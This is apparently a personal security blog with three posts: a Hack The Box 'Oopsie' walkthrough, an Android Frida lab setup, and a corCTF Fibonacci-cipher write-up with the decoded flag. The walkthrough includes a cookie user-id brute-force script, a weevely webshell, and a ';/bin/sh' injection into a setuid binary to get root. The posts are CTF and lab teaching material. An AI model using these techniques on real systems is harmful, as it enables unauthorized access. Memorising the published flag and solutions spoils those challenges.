Saturday 28 August 2021

[HTB] Oopsie

I could see two open ports: 22 and 80.

$ sudo nmap -PS -sS 10.10.10.28 -sC

Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http
|_http-title: Welcome


The main page had no login form and no other feature.


Viewing the page source revealed another directory.


I found two important pieces of information:
1. /cdn-cgi/login/login.php
2. /uploads/

I kept the second directory in mind; it becomes useful later.

I could see a login page.

The account was admin and password was "MEGACORP_4dm1n!!". The password was from the previous box.

I could see some menus and my cookie. The cookie was "user=34322; role=admin".

The uploads menu showed an error message "This action require super admin rights".


So I needed super admin rights. The role was already "admin", so I brute-forced the user number in the cookie.

import requests

def exp():
    host = "http://10.10.10.28"
    # Keep the role cookie we already have and try candidate user numbers
    for i in range(86574, 100000):
        cookies = {
            "user": str(i),
            "role": "admin"
        }

        r = requests.get(host + "/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
        # A rejected user gets a page containing "Authenticating"; anything else means access
        if "Authenticating" not in r.text:
            print(f"Found: {i}")
            return

if __name__ == "__main__":
    exp()

I found the user number to access the uploads menu.
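Why the cookie loop works, and what the check it bypasses should look like instead. This is an added example, not code from the box or from the write-up; the user table, the ids in it and the function names are hypothetical.

```python
# Added example, not code from the box or the write-up. The vulnerable check
# decides authorization from the `user` and `role` cookies the client sends,
# so a client can enumerate `user` values until one is the super admin. The
# hardened check accepts only an opaque random session token and reads both
# identity and role from server-side state, so a guessed id changes nothing.
import secrets

# Hypothetical user table (ids and roles are constructed, not from the box).
USERS = {34322: "admin", 40000: "super admin"}

# Server-side session store: token -> user id. Only the server writes to it.
SESSIONS = {}


def forged_cookie(uid: int) -> dict:
    """The cookie the brute-force loop sends: a guessed id plus a self-declared role."""
    return {"user": str(uid), "role": "admin"}


def is_super_admin_vulnerable(cookies: dict) -> bool:
    """Trusts client-controlled values: identity and role both come from the cookie."""
    try:
        uid = int(cookies.get("user", ""))
    except ValueError:
        return False
    return cookies.get("role") == "admin" and USERS.get(uid) == "super admin"


def login(uid: int) -> str:
    """Issue a fresh random token after authentication (the credential check itself is omitted)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = uid
    return token


def is_super_admin_hardened(cookies: dict) -> bool:
    """Identity comes only from the session store; role comes only from the user table."""
    uid = SESSIONS.get(cookies.get("session", ""))
    if uid is None:
        return False
    return USERS.get(uid) == "super admin"
```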

I generated a webshell using weevely.

On the box I found a user account and password.


I could access the box over SSH with robert's credentials and got the user flag.

Next, I needed root. I looked for other vulnerabilities.

After a few minutes, I noticed a suspicious group name, "bugtracker".


I found the suspicious binary /usr/bin/bugtracker with:
- find / -type f -group bugtracker 2>/dev/null

It runs with root permissions.

I got a root shell after supplying ";/bin/sh" as its input.


END

Wednesday 25 August 2021

Android Mobile App Assessment - Frida environment

This is how I set up a test environment for Frida.

Below is my test environment for frida-server and frida-client:

|---------------------------------------------------------------------------|
|                                                                           |
|   |-------------------------|           |-------------------------------| |
|   | Android-Studio AVD      |  <----->  | Ubuntu on VM Player           | |
|   | IP: 10.0.2.2 (NAT)      |           | IP: 192.168.172.129 (NAT)     | |
|   |-------------------------|           |-------------------------------| |
|                                                                           |
|                                                   Windows 10              |
|                                                   192.168.1.101           |
|---------------------------------------------------------------------------|


That's a simple test environment.

The frida-server runs on the Android-Studio AVD, and frida-tools runs on the Ubuntu VM.



Windows & AVD
1. Copy the frida-server file to Android (/data/local/tmp).
1.1. adb.exe push /<your-path of frida-server file> /data/local/tmp/

2. Open an adb shell and run frida-server on the AVD.
2.1. adb shell; cd /data/local/tmp; chmod 755 ./frida-server; ./frida-server

Windows
3. Forward the ports with adb.
3.1. .\adb.exe forward tcp:27042 tcp:27042
3.2. .\adb.exe forward tcp:27043 tcp:27043
3.3. adb now forwards the ports, but it listens on 127.0.0.1 only.

4. Forward the ports again with the Windows portproxy.
4.1. netsh interface portproxy add v4tov4 listenport=27044 listenaddress=0.0.0.0 connectport=27042 connectaddress=127.0.0.1
4.2. netsh interface portproxy add v4tov4 listenport=27045 listenaddress=0.0.0.0 connectport=27043 connectaddress=127.0.0.1
4.3. netsh interface portproxy show all
4.4. Now the ports are forwarded and listen on 0.0.0.0, so the Ubuntu VM can reach them. Note that this also exposes frida-server to every host that can reach 192.168.1.101, and portproxy rules persist until you delete them.

|----------------------------------------------------------------------------------------------|
|  Windows                                                                                     |
|                                                                                              |
|   |-------------------|                                                    |--------------|  |
|   | listening 27042   | --- 127.0.0.1:27042 --->  <--- 0.0.0.0:27044 ----- | frida-ps     |  |
|   | listening 27043   | --- 127.0.0.1:27043 --->  <--- 0.0.0.0:27045 ----- |              |  |
|   |------- AVD -------|      (adb forward)          (netsh portproxy)      |-- Ubuntu ----|  |
|                                                                                              |
|----------------------------------------------------------------------------------------------|

Ubuntu
5. Connect to frida-server
5.1 frida-ps -H 192.168.1.101:27044


[Extra tips]
adb.exe logcat



Tuesday 24 August 2021

corCTF - writeup for crypto/fibinary

It is a simple crypto challenge.

The challenge provides the code below and the encrypted flag:

enc.py

fib = [1, 1]
for i in range(2, 11):
        fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):
        n = ord(c)
        b = ''
        for i in range(10, -1, -1):
                if n >= fib[i]:
                        n -= fib[i]
                        b += '1'
                else:
                        b += '0'
        return b

flag = open('flag.txt', 'r').read()
enc = ''
for c in flag:
        enc += c2f(c) + ' '
with open('flag.enc', 'w') as f:
        f.write(enc.strip()) 

flag.enc

10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 00101001010 10000101000 10100000100 00000100100  

I wrote a simple brute-force script to decrypt the encrypted flag.

dec.py

fib = [1, 1]
for i in range(2, 11):
    fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):
    # Same greedy encoder as in enc.py
    n = ord(c)
    b = ''
    for i in range(10, -1, -1):
        if n >= fib[i]:
            n -= fib[i]
            b += '1'
        else:
            b += '0'
    return b


flag_enc = open('flag.enc', 'r').read()

dec = ''
for flag_blk in flag_enc.split(' '):
    # Try every ASCII code until its encoding matches this block
    for c in range(0, 127):
        if c2f(chr(c)) == flag_blk:
            dec += chr(c)
print(dec)
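The brute force is not actually needed: c2f() is a greedy Zeckendorf encoder, so each block can be decoded directly by summing the weights of its set bits. The decoder below is an added example (not the challenge's or the write-up's code); it embeds the flag.enc from the challenge and round-trips every ASCII value to show the encoding is unique.

```python
# Added example, not the challenge's or the write-up's code. c2f() is a greedy
# Zeckendorf encoder: the bit at position i (MSB first) stands for the weight
# fib[10 - i], and the greedy choice makes the representation of every value
# in 0..127 unique (and never puts two '1's next to each other). Decoding
# therefore needs no brute force: add up the weights of the set bits.
FIB = [1, 1]
for i in range(2, 11):
    FIB.append(FIB[i - 1] + FIB[i - 2])   # [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]
WEIGHTS = FIB[::-1]                        # weight of each bit, MSB first


def encode_char(c: str) -> str:
    """Greedy Fibonacci encoding, equivalent to the challenge's c2f()."""
    n = ord(c)
    bits = []
    for w in WEIGHTS:
        if n >= w:
            n -= w
            bits.append("1")
        else:
            bits.append("0")
    return "".join(bits)


def decode_block(block: str) -> str:
    """Inverse of encode_char(): sum the weights of the '1' bits."""
    if len(block) != len(WEIGHTS) or set(block) - {"0", "1"}:
        raise ValueError(f"malformed block: {block!r}")
    n = sum(w for bit, w in zip(block, WEIGHTS) if bit == "1")
    if n > 127:   # the encoder only ever sees ASCII characters
        raise ValueError(f"block {block!r} decodes to non-ASCII value {n}")
    return chr(n)


def decode(enc: str) -> str:
    """Decode a whole flag.enc (space-separated 11-bit blocks)."""
    return "".join(decode_block(b) for b in enc.split())


# The flag.enc from the challenge (copied from above, not constructed).
FLAG_ENC = (
    "10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 "
    "10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 "
    "10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 "
    "00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 "
    "00101001010 10000101000 10100000100 00000100100"
)

if __name__ == "__main__":
    print(decode(FLAG_ENC))   # the last block is the trailing newline of flag.txt
```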


Flag:
corctf{b4s3d_4nd_f1bp!113d}